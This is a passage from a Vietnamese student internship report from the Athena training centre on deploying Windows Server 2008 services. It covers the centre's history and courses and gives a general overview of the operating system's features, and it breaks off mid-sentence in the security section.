Baocaocuoiky athena

Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế Athena

BÁO CÁO THỰC TẬP CUỐI KHÓA

Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008

GVHD: Võ Đỗ ThắngSinh viên thục hiện:- Lý Ngọc Diệp- Phạm Thị Diễm Kiều- Nguyễn Thị Tuyết

TP. Hồ Chí Minh, ngày 5 tháng 5 năm 2014


LỜI MỞ ĐẦUNgày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên

phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.

Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.

Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008 nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với nhau.

Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp chúng em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng.

Tuy đã có rất nhiều cố gắng song không thể tránh những khuyết điểm, sai sót. Vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc để chúng em có thể ngày một hoàn thiện đề tài đã chọn một cách tốt hơn nữa. Xin chân thành cảm ơn.


LỜI CẢM ƠN

Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng những kiến thức đã học vào thực tế công việc ở các cơ quan quản lý hành chính nhà nước và các công việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối, chuyên ngành công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM, chúng em đã được tham gia trong suốt quá trình thực tập tại trung tâm Athena.

Tại đây chúng em đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý Thầy Cô khoa công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng em hoàn thành khóa thực tập này.Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng góp ý kiến của quý Thầy Cô cũng như nhiều bạn cùng chuyên môn để có thể nắm vững kiến thức hơn.Sau cùng, chúng em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng lời chúc sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho thế hệ mai sau.Trân trọng.

XÁC NHẬN CỦA CƠ QUANTHỦ TRƯỞNG

(ký tên, đóng dấu)


NHẬN XÉT CỦA GIÁO VIÊN........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

…...., ngày….tháng….năm……CÁN BỘ HƯỚNG DẪN

(ký tên)


Mục Lục

CHƯƠNG 1: TỔNG QUAN.................................................................................3

1.1 Giới thiệu về cơ quan thực tập................................................................31.1.1 Giới thiệu công ty.................................................................................31.1.2 Trụ sở và các chi nhánh........................................................................11.1.3 Cơ cấu tổ chức......................................................................................21.1.4 Cơ sở vật chất........................................................................................21.1.5 Các sản phẩm, giải pháp.......................................................................3

1.1.5.1 Các khóa học dài hạn:....................................................................31.1.5.2 Các khóa học ngắn hạn:.................................................................3

1.1.5.2.1 Khóa Quản trị mạng :..............................................................31.1.5.2.2 Khóa thiết kế web và bảo mật mạng.......................................3

1.1.5.3 Các sản phẩm khác.........................................................................31.1.5.3 Quá trình hình thành và phát triển.................................................3

1.1.5.3.1 Quá trình hình thành...............................................................31.1.5.3.2 Quá trình phát triển.................................................................4

1.2 Giới thiệu về nội dung công việc được giao thực tập............................51.2.1 Công việc cần được giải quyết..............................................................51.2.2 Vấn đề cần được giải quyết...................................................................51.2.3 Phạm vi đề tài........................................................................................5

CHƯƠNG 2: KIẾN THỨC CƠ SỞ......................................................................5

2.1 Lý thuyết.....................................................................................................5

2.2 Kỹ thuật......................................................................................................6

CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ............................6

3.1 Phương pháp nghiên cứu..........................................................................6

3.2 Mô tả chi tiết...............................................................................................6

3.3 Kết quả........................................................................................................6

CHƯƠNG 4: NỘI DUNG THỰC TẬP................................................................6

4.1 Kiến thức tìm hiểu.....................................................................................64.1.1 Giải pháp mạng doanh nghiệp..............................................................6

4.1.1.1 Giới thiệu về mạng doanh nghiệp..................................................64.1.1.2 Các thành phần công nghệ trong mạng doanh nghiệp...................7

4.1.2 Giới thiệu Windows Server 2008..........................................................74.1.2.1 Nền tảng chắc chắn dành cho doanh nghiệp..................................84.1.2.2 Tích hợp Công nghệ Ảo hóa (Virtualization)................................84.1.2.3 Được xây dựng phục vụ Web........................................................84.1.2.4 Bảo mật cao....................................................................................94.1.2.5 Tính toán hiệu năng cao.................................................................9

4.2 Quá trình làm việc và các kiến thức.........................................................94.2.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare........................................................................................................9


4.2.1.1 Cài đặt VMWARE WORKSTATION...........................................94.2.1.2 Cài đặt và cấu hình máy chủ Windows Server 2008...................154.2.1.3 Cài đặt LOCAL USER, GROUP, POLICY VÀ SECURITY POLICY...................................................................................................20

4.2.1.3.1 Triển khai Local User và Group...........................................204.2.1.3.2 Triển khai Local Policy.........................................................274.2.1.3.3 Local Security policy............................................................38

4.2.1.4 Nâng cấp Domain Contronller và Join domain...........................494.2.1.5 Triển khai dịch vụ DNS...............................................................784.2.1.6 Triển khai dịch vụ DHCP............................................................844.2.1.7 Web Server...................................................................................904.2.1.8 Mail Server..................................................................................994.2.1.9 VPN............................................................................................112

4.2.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private server)............................................................................................127

4.2.2.1 Mail Server trên máy chủ ảo VPS..............................................1274.2.2.2 Cài đặt và cấu hình Web Server trên VPS.................................144

4.2.3 Bảo mật WINDOWS........................................................................1544.2.3.1 Khai thác mã lỗi MS10_042......................................................1544.2.3.2 Khai thác mã lỗi MS10_042......................................................160

4.2.4 BACKUP WINDOWS SERVER 2008...........................................167

Kết Luận............................................................................................................174

Phụ lục...............................................................................................................175


CHƯƠNG 1: TỔNG QUAN1.1 Giới thiệu về cơ quan thực tập1.1.1 Giới thiệu công ty

Trung tâm Đào Tạo Quản Trị Mạng và An ninh Mạng Quốc Tế ATHENA_ Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.

Tên công ty viết bằng tiếng anh: Athena Advice Traningnetwork Security Company Limited Athena

Là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thong tin. Với quyết tâm góp phần vào công cuộc đẩy tiến trình tin học hóa của nước nhà ATHENA đã và đang tập trung chủ yếu vào các hoạt động sau:

- Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính, internet, bảo mật và thương mại điện tử…


- Tư vấn và hỗ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh doanh.

- Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.

- Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu thong tin về các ứng dụng và sự cố mạng.

- Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố máy tính.

1.1.2 Trụ sở và các chi nhánh Trụ sở chính:

Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế ATHENA .Số 2 Bis Đinh Tiên Hoàng , phường Đa Kao, Tp Hồ Chí Minh , Việt Nam.Website :www.athena.com.vnĐiện thoại: (84-8) 38244041Hotline : 0943 23 00 99

Cơ sở 2Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế ATHENA92 Nguyễn Đình Chiểu, phường Đa Kao, Quận 1, Tp Hồ Chí Minh, Việt Nam.Website :www.Athena.Edu.VnĐiện thoại: (84-8) 2210 3801Hotline : 0943 111 692

Chi nhánh Nha Trang+ Điện thoại: 08 3824 4041 + Fax: 08 39 111 692+Website: www.athena.edu.vn+Email: [email protected]

mailto:[email protected]

http://www.athena.edu.vn/

http://www.Athena.Edu.Vn/

http://www.athena.com.vn/


1.1.3 Cơ cấu tổ chức

Sơ đồ cơ cấu tổ chức công ty

Sau gần 10 năm hoạt động , nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin – Bộ Quốc Phòng, Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......1.1.4 Cơ sở vật chất

- Thiết bị đầy đủ và hiện đại- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với

những công nghệ mới nhất.- Phòng máy rộng rãi, thoáng mát tạo điều kiện tốt nhất cho sinh viên

thực tập của như học viên học tập và làm việc tại Trung tâm.


1.1.5 Các sản phẩm, giải pháp

1.1.5.1 Các khóa học dài hạn:- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena

network security specialist. - Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork

security Technician. - Chuyên viên quản trị mạng nâng cao (ANMA) Athena network

manager Administrator.

1.1.5.2 Các khóa học ngắn hạn:

1.1.5.2.1 Khóa Quản trị mạng :- Quản trị mạng Microsoft căn bản ACBN - Phần cứng máy tính, laptop, server - Quản trị hệ thống mạng Microsoft MCSA Security.- Quản trị mạng Microsoft nâng cao MCSE- Quản trị window Vista - Quản trị hệ thống Window Server 2008, 2012- Lớp Master Exchange Mail Server- Quản trị mạng quốc tế Cissco CCNA- Quản trị hệ thống mạng Linux 1 và Linux 2.

1.1.5.2.2 Khóa thiết kế web và bảo mật mạng- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart- Lập trình web với Php và MySQL- Bảo mật mạng quốc tế ACNS- Hacker mũ trắng - Athena Mastering Firewall Security- Bảo mật website.

1.1.5.3 Các sản phẩm khác- Chuyên đề thực hành sao lưu và phục hồi dữ liệu- Chuyên đề thực hành bảo mật mạng Wi_Fi- Chuyên đề Ghost qua mạng- Chuyên đề xây dựng và quản trị diễn đàn- Chuyên đề bảo mật dữ liệu phòng chống nội gián- Chuyên đề quản lý tài sản công nghệ thông tin - Chuyên đề kỹ năng thương mại điện tử.

1.1.5.3 Quá trình hình thành và phát triển

1.1.5.3.1 Quá trình hình thànhNăm 2000, một nhóm các thành viên là những doanh nhân tài năng và

thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho doanh nghiệp , cá nhân có nhu cầu. Bước phát triển


tiếp theo là vươn tầm đào tạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. Các thành viên sang lập trung tâm gồm:

- Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.

- Ông Hứa Văn Thế Phúc: Phó Giám Dốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT.

- Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hang Liên Việt, chịu trách nhiệm công nghệ thông tin của ngân hàng.

- Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.

Đến năm 2003, bốn thành viên sang lập cùng với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền nam.

Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, hay còn gọi là Trung tâ đào tạo Quản trị và An ninh mạng Quốc Tế Athena( tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHEN), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.

1.1.5.3.2 Quá trình phát triểnTừ năm 2004-2006: Trung tâm có nhiều bước phát triển và chuyển

mình. Trung tâm trở thành một trong nhựng địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng va đào tạo cho đội ngũ nhân viên của doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử , bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_ sinh viên đến đang kí học.

Đến năm 2006: Trung tâm đào tạo quản trị an ninh mạng Athena mở ra thêm một chi nhánh tại Cư xá Nguyễn Văn Trổi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp tại các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng ông Hứa Văn Thế Phúc rút khỏi công ty gây nên sự hoang mang cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xá Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi vào khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp ục sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.

Từ năm 2009- nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay Trung tâm đã trở thành một trong


những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự lien kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.

1.2 Giới thiệu về nội dung công việc được giao thực tập

1.2.1 Công việc cần được giải quyếtKhi bước vào môi trường thực tập tại đơn vị thì công việc được phân

công rõ ràng với chủ đề mình tự chọn. Chủ đề tham gia chính là nghiên cứu và khai triển dịch vụ quản lí server windows 2008. Công việc cần giải quyết bao gồm:

- Cài đặt Windows Server 2008.- Nâng cấp Stand Alone thành Domain Controller.- Cài đặt windows XP.- Join Domain cho windows XP.- Cài đặt và cấu hình DNS và DHCP.- Dịch vụ Mail Server .- Dịch vụ Web Sever.- Công nghệ VPN.- Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual

private server).- Backup trong Windows Server 2008.

1.2.2 Vấn đề cần được giải quyết- Vấn đề đặt ra vẫn còn nhiều khó khăn. Chủ đề đã nhiều người thực

hiện rất tốt. Chính vì thế đã gây nhiều áp lực khi thực hiện, đòi hỏi nhiều chuyên sâu hơn.

- Yêu cầu đặt ra phải được thực hiện rõ ràng, các máy ảo phải được thực hiện đầy đủ. Các bước thực hiện phải được ghi lại một cách chi tiết.

1.2.3 Phạm vi đề tài- Làm với Windows Server 2008- Nghiên cứu với Windows Server 2008.

CHƯƠNG 2: KIẾN THỨC CƠ SỞ2.1 Lý thuyết

Hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố mạng và nắm được các phương pháp để bảo vệ mạng trước trước nguy cơ virus, worm, trojan, spam. Cũng như các biện pháp chống xâm nhập, ăn cắp thông tin, phá hoại mạng.

Công việc cần thực hiện chính là nắm được các bước và cách làm để thực hiện quản trị cách tốt nhất. Biết cách cài đặt máy chủ và client, tìm hiểu nhiều tài liệu để biết quản trị các hoạt Nắm vững các bước thực hiện trong quản trị Windows server 2008.

Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh năng hoạt động của mạng.


2.2 Kỹ thuậtHoạch định và chuẩn bị đầy đủ là yếu tố quan trọng quyết định quá

trình cài đặt có thuận lợi hay không. Trước khi cài đặt, bạn phải biết được những gì cần có để có thể cài đặt thành công và bạn có được tất cả thông tin cần thiết để cung cấp cho quá trình cài đặt. Để lên kế hoạch cho việc nâng cấp hoặc cài đặt mới các Server nên tham khảo các hướng dẫn từ Microsoft Windows Server 2008. Các thông tin biết trước khi nâng cấp hoặc cài mới hệ điều hành:

- Phần cứng đáp ứng được yêu cầu của Windows Server 2008.- Làm sao để biết được phần cứng của hệ thống có được Windows

Server 2008 có hỗ trợ hay không- Điểm khác biệt giữa cài đặt mới và nâng cấp (upgrade).- Những lựa chọn cài đặt nào thích hợp với hệ thống của bạn, chẳng

hạn chiến lược chia partition đĩa, và bạn sẽ sử dụng hệ thống tập tin nào…- Còn nhiều yêu cầu kĩ thuật sẽ nói trong chương 4

CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ3.1 Phương pháp nghiên cứu

- Phương pháp nghiên cứu chính là tìm hiểu các tài liệu, làm theo yêu cầu của đơn vị thực tập, được hướng dẫn chi tiết cách thức thực hiện.

- Xác định rõ ràng công việc cần thực hiện- Sắp xếp lịch để thực hiện- Cần chuẩn bị những gì để đáp ứng yêu cầu mà đề tài nghiên cứu đã

đặt ra.- Cài đặt máy thích hợp để thực hiện - Chuẩn bị phần cứng , ổ đĩa để đáp ứng cho việc nghiên cứu

3.2 Mô tả chi tiếtNêu rõ từng bước thục hiện, chú thích. Sẽ được nêu rõ trong chương 4

3.3 Kết quảKết quả chính là các demo chạy chương trình và các bước thực hành,

được nêu các hướng dẫn chi tiết từng bước đồng thời sẽ kèm theo các clip quay lại từng quá trình, sẽ được trình bày cụ thể tại chương 4.CHƯƠNG 4: NỘI DUNG THỰC TẬP

4.1 Kiến thức tìm hiểu

4.1.1 Giải pháp mạng doanh nghiệp

4.1.1.1 Giới thiệu về mạng doanh nghiệpHệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo

quy mô và loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều sự chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản lý hoặc sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính cũng có những giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.

Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu khác nhau về quản trị hệ thống mạng (network) của doanh


nghiệp. Một hệ thống được kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng như độ tin cậy của hệ thống.

4.1.1.2 Các thành phần công nghệ trong mạng doanh nghiệpTùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải

pháp công nghệ và thiết kế sao cho phù hợp nhất.Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên

của hệ thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát mạng. Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban đầu hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự phát triển của thế giới.

4.1.2 Giới thiệu Windows Server 2008Window Server 2008 là hệ điều hành Windows Server tân tiến nhất

cho tới thời điểm này, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và dịch vụ Web thế hệ mới. Với Windows Server 2008, bạn có thể phát triển, cung cấp và quản lý các trải nghiệm người dùng và ứng dụng phong phú, đem tới một hạ tầng mạng có tính bảo mật cao, và tăng cường hiệu quả về mặt công nghệ và giá trị trong phạm vi tổ chức của mình.

Windows Server 2008 kế thừa những thành công và thế mạnh của các hệ điều hành Windows Server thế hệ trước, đồng thời đem tới tính năng mới có giá trị và những cải tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới, công nghệ ảo hóa, tính bảo mật tăng cường và các tiện ích quản lý giúp tiết kiệm thời gian, giảm bớt các chi phí, và đem tới một nền tảng vững chắc cho hạ tầng Công nghệ Thông tin (CNTT) của bạn.

Microsoft Windows Server 2008 là thế hệ kế tiếp của hệ điều hành Windows Server, có thể giúp các chuyên gia công nghệ thông tin có thể kiểm soát tối đa cơ sở hạ tầng của họ và cung cấp khả năng quản lý và hiệu lực chưa từng có, là sản phẩm hơn hẳn trong việc đảm bảo độ an toàn, khả năng tin cậy và môi trường máy chủ vững chắc hơn các phiên bản trước đây.

Windows Server 2008 cung cấp những giá trị mới cho các tổ chức bằng việc bảo đảm tất cả người dùng đều có thể có được những thành phần bổ sung từ các dịch vụ từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng vượt trội bên trong hệ điều hành và khả năng chuẩn đoán, cho phép các quản trị viên tăng được thời gian hỗ trợ cho các doanh nghiệp.

Windows Server 2008 được thiết kế để cung cấp cho các tổ chức có được nền tảng sản xuất tốt nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm việc đến những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và những cải thiện mạnh mẽ cho hệ điều hành cơ bản.

Cải thiện hệ điều hành cho máy chủ Windows.Thêm vào tính năng mới, Windows Server 2008 cung cấp nhiều cải thiệm tốt hơn cho hệ điều hành cơ bản so với hệ điều hành Windows Server 2003.

Những cải thiện có thể thấy được gồm có các vấn đề về mạng, các tính năng bảo mật nâng cao, truy cập ứng dụng từ xa, quản lý role máy chủ tập


trung, các công cụ kiểm tra độ tin cậy và hiệu suất, nhóm chuyển đổi dự phòng, sự triển khai và hệ thống file.

4.1.2.1 Nền tảng chắc chắn dành cho doanh nghiệpWindows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả

các yêu cầu về ứng dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển khai và quản lý. Thành phần mới Server Manager cung cấp một console quản lý hợp nhất, đơn giản hóa và sắp xếp một cách hợp lý việc cài đặt, cấu hình và quản lý liên tục cho máy chủ. Windows PowerShell, một shell mới kiểu dòng lệnh, giúp quản trị viên tự động hóa các tác vụ thường trình về quản trị hệ thống trên nhiều máy chủ. Windows Deployment Services đem tới một phương tiện bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều hành này qua các bước cài đặt trên nền mạng.Thêm vào đó, các wizard Failover Clustering của Windows Server 2008, và việc hỗ trợ đầy đủ cho Giao thức Internet phiên bản 6 (gọi tắt là IPv6) cộng với khả năng quản lý hợp nhất Network Load Balancing khiến dễ dàng triển khai với tính sẵn có cao, thậm chí bởi những người có hiểu biết chung nhất về CNTT.

Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho phép cài đặt các vai trò máy chủ chỉ với những thành phần và hệ thống phụ cần thiết mà không cần giao diện người dùng. Việc có ít hơn các vai trò và đặc tính đồng nghĩa với việc giảm thiểu công việc cho ổ đĩa và dịch vụ, đồng thời giảm bớt các bề mặt tấn công. Sản phẩm cũng cho phép nhân viên CNTT xây dựng đặc tả tùy theo các vai trò máy chủ cần hỗ trợ.

4.1.2.2 Tích hợp Công nghệ Ảo hóa (Virtualization)Windows Server Hyper-V, công nghệ ảo hóa thế hệ kế tiếp dành cho

máy chủ trên nền hypervisor, cho phép tận dụng tối đa các khoản đầu tư vào phần cứng máy chủ bằng cách hợp nhất nhiều vai trò máy chủ thành các máy ảo riêng biệt chạy trên một máy vật lý duy nhất. Cũng có thể chạy song song nhiều hệ điều hành như Windows, Linux và các hệ điều hành khác một cách hiệu quả trên một máy chủ duy nhất. Với Hyper – V và các chính sách cấp phép đơn giản, giờ đây có thể tận dụng lợi thế của các khoản tiết kiệm chi phí và ảo hóa một cách dễ dàng hơn bao giờ hết.

Nhờ các công nghệ truy cập ứng dụng tập trung của Windows Server 2008, các ứng dụng cũng được ảo hóa một cách hiệu quả. Terminal Services Gateway và Terminal Services RemoteApp cho phép dễ dàng truy cập từ xa tới các chương trình chuẩn hoạt động trên nền Windows từ bất cứ vị trí nào bằng cách chạy chương trình trên một máy chủ đầu cuối thay vì chạy trực tiếp trên một máy trạm mà không cần tới một mạng riêng ảo (VPN) phức tạp.

4.1.2.3 Được xây dựng phục vụ WebWindows Server 2008 xuất hiện với Internet Information Services 7.0

(IIS 7.0), một nền tảng máy chủ Web dễ sử dụng, tăng cường bảo mật để phát triển và lưu trữ các ứng dụng và dịch vụ Web một cách tin cậy. Đặc tính nâng cao quan trọng đối với nền tảng Web IIS 7.0 bao gồm một kiến trúc được thành phần hóa để đem tới khả năng linh hoạt và kiểm soát cao


hơn. II.7.0 cũng cung cấp các khả năng quản lý được đơn giản hóa, khả năng khắc phục sự cố mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả năng mở rộng toàn diện.

Internet Information Server IIS 7.0 cùng với .NET Framework 3.0 cung cấp một nền tảng toàn diện để xây dựng các ứng dụng kết nối người dùng và dữ liệu, cho phép họ hình ảnh hóa, chia sẻ và thao tác thông tin. Thêm vào đó, IIS 7.0 còn đóng vai trò trung tâm trong việc hợp nhất các công nghệ nền tảng Web của Microsoft – ASP.NET, các dịch vụ Web của Windows Communication Foudation, và Windows Sharepoint Services.

4.1.2.4 Bảo mật caoWindows Server 2008 là hệ điều hành Windows Server bảo mật nhất

